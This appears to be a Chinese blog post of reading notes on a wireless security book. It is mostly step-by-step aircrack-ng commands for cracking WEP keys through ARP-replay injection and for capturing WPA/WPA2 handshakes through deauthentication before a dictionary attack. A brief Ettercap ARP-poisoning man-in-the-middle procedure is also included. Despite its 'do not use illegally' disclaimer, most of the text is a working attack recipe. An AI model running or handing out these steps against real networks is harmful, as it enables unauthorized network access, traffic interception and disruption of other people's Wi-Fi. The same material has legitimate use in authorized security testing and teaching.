`
learnmore
  • 浏览: 603083 次
  • 性别: Icon_minigender_1
  • 来自: 上海
社区版块
存档分类
最新评论

无线安全攻防实战

阅读更多
无线安全攻防实战
     书本没有过多的理论,直奔主题,全是实战经验,比较不错!(每篇都能独立成章,但有很多重复,有点啰嗦)

看了前八章,简单总结一下(提高无线安全防范意识,请勿用于非法用途)
一.wep(不安全,很容易破解,只有拦截到足够多的数据包,就可以破解)
  1.步骤如下;
    <1>linux环境中安装bt4,安装之前确保bt4支持你的无线网卡芯片
    <2>开启wicd管理器,方法:/etc/init.d/wicd start
    <3>开启监控网卡接口airmon-ng start wlan0 6 //在6频道开启网卡监控,wlan0是你的
        网卡代号,开启后会提示monitor为mon0
    <4>airodump-ng -w filename --channel 6 mon0  用监控模式mon0在6频道抓包并写入   你     自己指定的文件名中
    <5>aireplay-ng -3 -b ap's mac -h client's mac -x 1024 mon0
       arprequest注入攻击攻击,ap's mac 监控到的无线路由的mac地址,client's mac 监控到的客户端的mac地址,1024指的是每秒发送的数据包的数量,这种方式可以有效的提高抓包数量.
    <6>airorack-ng -x -f 2 filename.cap
       破解抓到的cap文件,得到密码(ivs最好在1W以上)
    <7>无客端chopchop攻击略
二.wpa&wpa2(加密算法更为高级,无法通过足够多的数据包来破解,需要监控到客户端的握手信息,然后配合字典进行破解,难度较高,如果没有好的字典加上密码复杂的话,破解时间可能会以年来计算)
   1.步骤如下:
     <1>airmon-ng start wlan0    //激活网卡的monitor模式
     <2>airodump-ng -w filename --channel 6 mon0 //开始嗅探并抓包
     <3>aireplay-ng 0 10 -a ap's mac mon0
        进行Deauthenticate验证攻击,迫使ap重新与客户端进行握手验证,从而使截握手验证数据包成为可能(经测试并非一下就成功,要攻击多次)
     <4>截获到wpa握手数据包时,右上角会有提示,这时ctrl+c中止airodump-ng
     <5>zcat /pentest/password/dictionaries/wordlist.txt.Z>password.txt(bt4中好像是在/pendtest/passwords/名字忘了)
        解压缩bt4自带的字典文件,并命名为password
        cp /pentest/password/dictionaries/password/ /root
        将文件拷到 root目录下面
     <6>aircrack-ng -w password.txt filename.cap
        开始破解,破解时间取决于你机器的配置,字典的包含程度等(书上说有些网站提供的字典文件大小甚至达到300G,猛!)

三.进阶
   1.MITM攻击(a和b在通信,我告诉a我是b,然后告诉b我是a,截获双方通信包)
     步骤如下:
     <1>进入BT4打开EtterCap,选择自己工作的无线网卡
     <2>主机扫描,HostList会列出局域网内的其他主机
     <3>target->select target 填入网关和你要截获的主机ip,欺骗双方
     <4>arp posion
     <5>wirshark抓包,找到你想要的东西.
   2.拒绝服务攻击(dos攻击)
     待续..
   
  

   

   
   
    
分享到:
评论

相关推荐

Global site tag (gtag.js) - Google Analytics